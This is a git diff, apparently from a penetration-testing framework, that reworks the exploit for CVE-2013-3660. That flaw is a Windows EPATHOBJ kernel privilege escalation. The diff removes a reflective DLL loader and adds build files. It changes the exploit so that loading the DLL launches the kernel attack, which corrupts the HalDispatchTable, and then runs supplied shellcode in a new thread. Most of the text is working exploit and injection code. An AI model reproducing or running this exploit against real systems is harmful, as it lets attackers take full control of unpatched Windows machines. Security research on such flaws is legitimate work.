-				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
-			}
-			else
-			{
-				// get the VA of this functions import by name struct
-				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
-
-				// use GetProcAddress and patch in the address for this imported function
-				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
-			}
-			// get the next imported function
-			uiValueA += sizeof( ULONG_PTR );
-			if( uiValueD )
-				uiValueD += sizeof( ULONG_PTR );
-		}
-
-		// get the next import
-		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
-	}
-
-	// STEP 5: process all of our images relocations...
-
-	// calculate the base address delta and perform relocations (even if we load at desired image base)
-	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
-
-	// uiValueB = the address of the relocation directory
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
-
-	// check if their are any relocations present
-	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
-	{
-		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
-		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
-		// and we itterate through all entries...
-		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
-		{
-			// uiValueA = the VA for this relocation block
-			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
-
-			// uiValueB = number of entries in this relocation block
-			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
-
-			// uiValueD is now the first entry in the current relocation block
-			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
-
-			// we itterate through all the entries in the current block...
-			while( uiValueB-- )
-			{
-				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
-				// we dont use a switch statement to avoid the compiler building a jump table
-				// which would not be very position independent!
-				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
-					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
-					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
-#ifdef WIN_ARM
-				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
-				{	
-					register DWORD dwInstruction;
-					register DWORD dwAddress;
-					register WORD wImm;
-					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
-					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
-					// flip the words to get the instruction as expected
-					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
-					// sanity chack we are processing a MOV instruction...
-					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
-					{
-						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
-						wImm  = (WORD)( dwInstruction & 0x000000FF);
-						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
-						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
-						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
-						// apply the relocation to the target address
-						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
-						// now create a new instruction with the same opcode and register param.
-						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
-						// patch in the relocated address...
-						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
-						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
-						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
-						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
-						// now flip the instructions words and patch back into the code...
-						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
-					}
-				}
-#endif
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
-
-				// get the next entry in the current relocation block
-				uiValueD += sizeof( IMAGE_RELOC );
-			}
-
-			// get the next entry in the relocation directory
-			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
-		}
-	}
-
-	// STEP 6: call our images entry point
-
-	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
-	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
-
-	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
-	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
-
-	// call our respective entry point, fudging our hInstance value
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
-#else
-	// if we are injecting an DLL via a stub we call DllMain with no parameter
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
-#endif
-
-	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
-	return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
-    BOOL bReturnValue = TRUE;
-	switch( dwReason ) 
-    { 
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
-	return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
deleted file mode 100755
index b8eb22b0b1..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
+++ /dev/null
@@ -1,202 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-#include <Winsock2.h>
-#include <intrin.h>
-#include "ReflectiveDLLInjection.h"
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH				0x6A4ABC5B
-#define NTDLLDLL_HASH					0x3CFA685D
-
-#define LOADLIBRARYA_HASH				0xEC0E4E8E
-#define GETPROCADDRESS_HASH				0x7C0DFCAA
-#define VIRTUALALLOC_HASH				0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
-
-#define IMAGE_REL_BASED_ARM_MOV32A		5
-#define IMAGE_REL_BASED_ARM_MOV32T		7
-
-#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
-#define ARM_MOVW						0xF2400000
-#define ARM_MOVT						0xF2C00000
-
-#define HASH_KEY						13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
-	return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD hash( char * c )
-{
-    register DWORD h = 0;
-	do
-	{
-		h = ror( h );
-        h += *c;
-	} while( *++c );
-
-    return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
-  USHORT Length;
-  USHORT MaximumLength;
-  PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) ) 
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
-	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
-	LIST_ENTRY InMemoryOrderModuleList;
-	LIST_ENTRY InInitializationOrderModuleList;
-	PVOID DllBase;
-	PVOID EntryPoint;
-	ULONG SizeOfImage;
-	UNICODE_STR FullDllName;
-	UNICODE_STR BaseDllName;
-	ULONG Flags;
-	SHORT LoadCount;
-	SHORT TlsIndex;
-	LIST_ENTRY HashTableEntry;
-	ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
-   DWORD dwLength;
-   DWORD dwInitialized;
-   LPVOID lpSsHandle;
-   LIST_ENTRY InLoadOrderModuleList;
-   LIST_ENTRY InMemoryOrderModuleList;
-   LIST_ENTRY InInitializationOrderModuleList;
-   LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
-   struct _PEB_FREE_BLOCK * pNext;
-   DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
-   BYTE bInheritedAddressSpace;
-   BYTE bReadImageFileExecOptions;
-   BYTE bBeingDebugged;
-   BYTE bSpareBool;
-   LPVOID lpMutant;
-   LPVOID lpImageBaseAddress;
-   PPEB_LDR_DATA pLdr;
-   LPVOID lpProcessParameters;
-   LPVOID lpSubSystemData;
-   LPVOID lpProcessHeap;
-   PRTL_CRITICAL_SECTION pFastPebLock;
-   LPVOID lpFastPebLockRoutine;
-   LPVOID lpFastPebUnlockRoutine;
-   DWORD dwEnvironmentUpdateCount;
-   LPVOID lpKernelCallbackTable;
-   DWORD dwSystemReserved;
-   DWORD dwAtlThunkSListPtr32;
-   PPEB_FREE_BLOCK pFreeList;
-   DWORD dwTlsExpansionCounter;
-   LPVOID lpTlsBitmap;
-   DWORD dwTlsBitmapBits[2];
-   LPVOID lpReadOnlySharedMemoryBase;
-   LPVOID lpReadOnlySharedMemoryHeap;
-   LPVOID lpReadOnlyStaticServerData;
-   LPVOID lpAnsiCodePageData;
-   LPVOID lpOemCodePageData;
-   LPVOID lpUnicodeCaseTableData;
-   DWORD dwNumberOfProcessors;
-   DWORD dwNtGlobalFlag;
-   LARGE_INTEGER liCriticalSectionTimeout;
-   DWORD dwHeapSegmentReserve;
-   DWORD dwHeapSegmentCommit;
-   DWORD dwHeapDeCommitTotalFreeThreshold;
-   DWORD dwHeapDeCommitFreeBlockThreshold;
-   DWORD dwNumberOfHeaps;
-   DWORD dwMaximumNumberOfHeaps;
-   LPVOID lpProcessHeaps;
-   LPVOID lpGdiSharedHandleTable;
-   LPVOID lpProcessStarterHelper;
-   DWORD dwGdiDCAttributeList;
-   LPVOID lpLoaderLock;
-   DWORD dwOSMajorVersion;
-   DWORD dwOSMinorVersion;
-   WORD wOSBuildNumber;
-   WORD wOSCSDVersion;
-   DWORD dwOSPlatformId;
-   DWORD dwImageSubsystem;
-   DWORD dwImageSubsystemMajorVersion;
-   DWORD dwImageSubsystemMinorVersion;
-   DWORD dwImageProcessAffinityMask;
-   DWORD dwGdiHandleBuffer[34];
-   LPVOID lpPostProcessInitRoutine;
-   LPVOID lpTlsExpansionBitmap;
-   DWORD dwTlsExpansionBitmapBits[32];
-   DWORD dwSessionId;
-   ULARGE_INTEGER liAppCompatFlags;
-   ULARGE_INTEGER liAppCompatFlagsUser;
-   LPVOID lppShimData;
-   LPVOID lpAppCompatInfo;
-   UNICODE_STR usCSDVersion;
-   LPVOID lpActivationContextData;
-   LPVOID lpProcessAssemblyStorageMap;
-   LPVOID lpSystemDefaultActivationContextData;
-   LPVOID lpSystemAssemblyStorageMap;
-   DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
-	WORD	offset:12;
-	WORD	type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/make.msbuild b/external/source/exploits/cve-2013-3660/make.msbuild
new file mode 100755
index 0000000000..e620eef70f
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/make.msbuild
@@ -0,0 +1,18 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\ppr_flatten_rec.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
+
+  <Target Name="x86">
+    <Message Text="Building CVE-2013-3660 ppr_flatten_rc x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="ppr_flatten_rec is not supported in x64" />
+  </Target>
+</Project>
+
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln b/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
new file mode 100755
index 0000000000..b01875c989
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
+		{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
+		{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
+		{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
similarity index 96%
rename from external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
rename to external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
index 11c4134bb4..505d9961d2 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
@@ -418,19 +418,10 @@
 # define WIN32_NO_STATUS
 #endif
 #include <stdio.h>
-#include <stdarg.h>
-#include <stddef.h>
-#include <windows.h>
-#include <assert.h>
 #ifdef WIN32_NO_STATUS
 # undef WIN32_NO_STATUS
 #endif
-#include <ntstatus.h>
 
-#pragma comment(lib, "gdi32")
-#pragma comment(lib, "kernel32")
-#pragma comment(lib, "user32")
-#pragma comment(lib, "shell32")
 #pragma comment(linker, "/SECTION:.text,ERW")
 
 #ifndef PAGE_SIZE
@@ -448,11 +439,6 @@ static ULONG       ComplexPathNumRegion = 0;
 static HANDLE      Mutex;
 static DWORD       ComplexPathFinished = 0;
 
-// Log levels.
-typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
-
-BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
-
 // Copied from winddi.h from the DDK
 #define PD_BEGINSUBPATH   0x00000001
 #define PD_ENDSUBPATH     0x00000002
@@ -509,21 +495,24 @@ ULONG   HalQuerySystemInformation;
 PULONG  TargetPid;
 PVOID  *PsInitialSystemProcess;
 
-VOID elevator_complex_path();
+//#define DEBUGTRACE 1
 
-//#define DEBUGTRACE 1
-
-#ifdef DEBUGTRACE
-#define dprintf(...) real_dprintf(__VA_ARGS__)
-#else
-#define dprintf(...) do{}while(0);
-#endif
-
-static void real_dprintf(char *format, ...) {
-	va_list args;
-	char buffer[1024];
-	va_start(args,format);
-	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
-	strcat_s(buffer, sizeof(buffer), "\r\n");
-	OutputDebugStringA(buffer);
-}
\ No newline at end of file
+// Log levels.
+typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
+
+#ifdef DEBUGTRACE
+VOID LogMessage(LEVEL Level, PCHAR Format, ...);
+
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+static void real_dprintf(char *format, ...) {
+	va_list args;
+	char buffer[1024];
+	va_start(args,format);
+	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+}
+#else
+#define dprintf(...)
+#define LogMessage(...)
+#endif
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
similarity index 90%
rename from external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
rename to external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
index 547fd1fd85..f4776eb046 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
@@ -1,15 +1,15 @@
 //===============================================================================================//
-// This is a stub for the actuall functionality of the DLL.
+// This is a stub for the actual functionality of the DLL.
 //===============================================================================================//
 
-// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
-// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 
-// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
-//===============================================================================================//
-
-#include "ReflectiveLoader.h"
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
 #include "ComplexPath.h"
 
+// Purloined from ntstatus.h
+#define STATUS_SUCCESS                          ((NTSTATUS)0x00000000L) // ntsubauth
+
 //
 // --------------------------------------------------
 // Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
     }
 }
 
-VOID elevator_complex_path()
+/*!
+ * @brief Helper thread function which runs the given payload directly.
+ * @param lpPayload The payload shellcode to execute.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
+	LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
+	VOID(*lpCode)() = (VOID(*)())lpPayload;
+	lpCode();
+	return ERROR_SUCCESS;
+}
+
+VOID elevator_complex_path(LPVOID lpPayload)
 {
     HANDLE               Thread;
     HDC                  Device;
@@ -566,6 +579,12 @@ VOID elevator_complex_path()
                        "\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
                        "\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
                        "\n");
+
+	if (lpPayload == NULL) {
+		LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
+		return;
+	}
+
     NtQueryIntervalProfile    = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
     NtQuerySystemInformation  = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
     Mutex                     = CreateMutex(NULL, FALSE, NULL);
@@ -590,10 +609,10 @@ VOID elevator_complex_path()
 
     // Lookup some system routines we require.
     KernelHandle                = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
-    HalDispatchTable            = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable")           - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
-    PsInitialSystemProcess      = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess")     - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
-    PsReferencePrimaryToken     = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken")    - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
-    PsLookupProcessByProcessId  = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+    HalDispatchTable            = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable")           - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+    PsInitialSystemProcess      = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess")     - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+    PsReferencePrimaryToken     = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken")    - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+    PsLookupProcessByProcessId  = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
 
     // Search for a ret instruction to install in the damaged HalDispatchTable.
     HalQuerySystemInformation   = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@@ -629,7 +648,7 @@ VOID elevator_complex_path()
 
     // I need to map at least two pages to guarantee the whole structure is
     // available.
-    while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
+    while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
                          PAGE_SIZE * 2,
                          MEM_COMMIT | MEM_RESERVE,
                          PAGE_EXECUTE_READWRITE)) {
@@ -740,7 +759,7 @@ VOID elevator_complex_path()
 
     if (ComplexPathFinished) {
         LogMessage(L_INFO, "Success...", ComplexPathFinished);
-        //ExitProcess(0);
+		CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
 		return;
     }
 
@@ -756,7 +775,8 @@ VOID elevator_complex_path()
 }
 
 // A quick logging routine for debug messages.
-BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
+#ifdef DEBUGTRACE
+VOID LogMessage(LEVEL Level, PCHAR Format, ...)
 {
     CHAR Buffer[1024] = {0};
     va_list Args;
@@ -774,28 +794,34 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
 
 	//fflush(stdout);
     //flush(stderr);
-
-    return TRUE;
 }
-extern HINSTANCE hAppInstance;
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+#else
+#define LogMessage(...)
+#endif
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
 {
-    BOOL bReturnValue = TRUE;
-	switch( dwReason ) 
-    { 
-		case DLL_QUERY_HMODULE:
-			if( lpReserved != NULL )
-				*(HMODULE *)lpReserved = hAppInstance;
-			hAppInstance = hinstDLL;
-			elevator_complex_path();
-			break;
-		case DLL_PROCESS_ATTACH:
-			hAppInstance = hinstDLL;
-			break;
-		case DLL_PROCESS_DETACH:
-		case DLL_THREAD_ATTACH:
-		case DLL_THREAD_DETACH:
-            break;
-    }
+	BOOL bReturnValue = TRUE;
+	dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
+	switch (dwReason)
+	{
+	case DLL_QUERY_HMODULE:
+		hAppInstance = hinstDLL;
+		dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
+		if (lpReserved != NULL)
+		{
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
+		elevator_complex_path(lpReserved);
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
 	return bReturnValue;
 }
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
new file mode 100755
index 0000000000..6368dc6a25
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj
@@ -0,0 +1,141 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{942BF20A-E438-48B0-A614-A6E0CC2E94BD}</ProjectGuid>
+    <RootNamespace>ppr_flatten_rec</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
